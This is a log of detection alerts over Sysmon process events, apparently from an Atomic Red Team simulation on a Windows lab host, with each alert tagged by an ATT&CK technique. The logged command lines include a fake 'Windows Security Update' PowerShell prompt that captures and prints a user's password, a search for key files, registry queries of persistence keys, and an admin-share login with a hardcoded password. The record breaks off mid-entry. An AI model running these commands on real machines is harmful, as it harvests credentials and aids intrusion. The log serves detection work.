[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1,"
1
5
4
1
0
0x8000000000000000
3631
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:46:51.935
747F3D96-D7DB-5D31-0000-0010B5A82A00
4452
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-D7DB-5D31-0000-001089A52A00
4256
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1,"
1
5
4
1
0
0x8000000000000000
3630
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:46:51.871
747F3D96-D7DB-5D31-0000-001089A52A00
4256
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contains suspicious command ( \csc.exe ),1,"
1
5
4
1
0
0x8000000000000000
3617
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:46:19.023
747F3D96-D7BB-5D31-0000-0010E7FE2900
2056
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
4.7.3190.0 built by: NET472REL1LAST_C
Visual C# Command Line Compiler
Microsoft® .NET Framework
Microsoft Corporation
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3616
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:45:56.040
747F3D96-D7A4-5D31-0000-001020C62900
4080
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1,"
1
5
4
1
0
0x8000000000000000
3695
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.710
747F3D96-D87C-5D31-0000-0010CA5B3100
956
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1,"
1
5
4
1
0
0x8000000000000000
3693
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.629
747F3D96-D87C-5D31-0000-00103F573100
2440
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1,"
1
5
4
1
0
0x8000000000000000
3691
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.541
747F3D96-D87C-5D31-0000-0010B4523100
4016
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1,"
1
5
4
1
0
0x8000000000000000
3689
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.447
747F3D96-D87C-5D31-0000-0010264E3100
1428
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1,"
1
5
4
1
0
0x8000000000000000
3687
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.377
747F3D96-D87C-5D31-0000-001097493100
1680
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1,"
1
5
4
1
0
0x8000000000000000
3685
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.284
747F3D96-D87C-5D31-0000-001009453100
5016
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1,"
1
5
4
1
0
0x8000000000000000
3683
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.212
747F3D96-D87C-5D31-0000-00107A403100
5984
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1,"
1
5
4
1
0
0x8000000000000000
3681
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:32.135
747F3D96-D87C-5D31-0000-0010E83B3100
2888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3680
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:49:31.675
747F3D96-D87B-5D31-0000-0010D92D3100
3188
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1,"
1
5
4
1
0
0x8000000000000000
3678
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:57.532
747F3D96-D859-5D31-0000-001045922F00
6220
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key "
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D859-5D31-0000-0010FB8F2F00
888
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1,"
1
5
4
1
0
0x8000000000000000
3677
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:57.502
747F3D96-D859-5D31-0000-0010FB8F2F00
888
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1,"
1
5
4
1
0
0x8000000000000000
3676
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:57.433
747F3D96-D859-5D31-0000-0010E68C2F00
6524
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3675
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:46.221
747F3D96-D84E-5D31-0000-00102C702F00
1628
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
1
5
4
1
0
0x8000000000000000
3674
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:41.103
747F3D96-D849-5D31-0000-00103C522F00
6068
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D849-5D31-0000-0010E54F2F00
3284
C:\Windows\System32\cmd.exe
cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
1
5
4
1
0
0x8000000000000000
3674
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:41.103
747F3D96-D849-5D31-0000-00103C522F00
6068
C:\Windows\System32\net.exe
10.0.17763.1 (WinBuild.160101.0800)
Net Command
Microsoft® Windows® Operating System
Microsoft Corporation
net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
747F3D96-D849-5D31-0000-0010E54F2F00
3284
C:\Windows\System32\cmd.exe
cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
1
5
4
1
0
0x8000000000000000
3673
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:41.068
747F3D96-D849-5D31-0000-0010E54F2F00
3284
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D849-5D31-0000-0010914D2F00
2096
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
1
5
4
1
0
0x8000000000000000
3672
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:41.034
747F3D96-D849-5D31-0000-0010914D2F00
2096
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
3670
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:48:37.099
747F3D96-D845-5D31-0000-001098212F00
2624
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
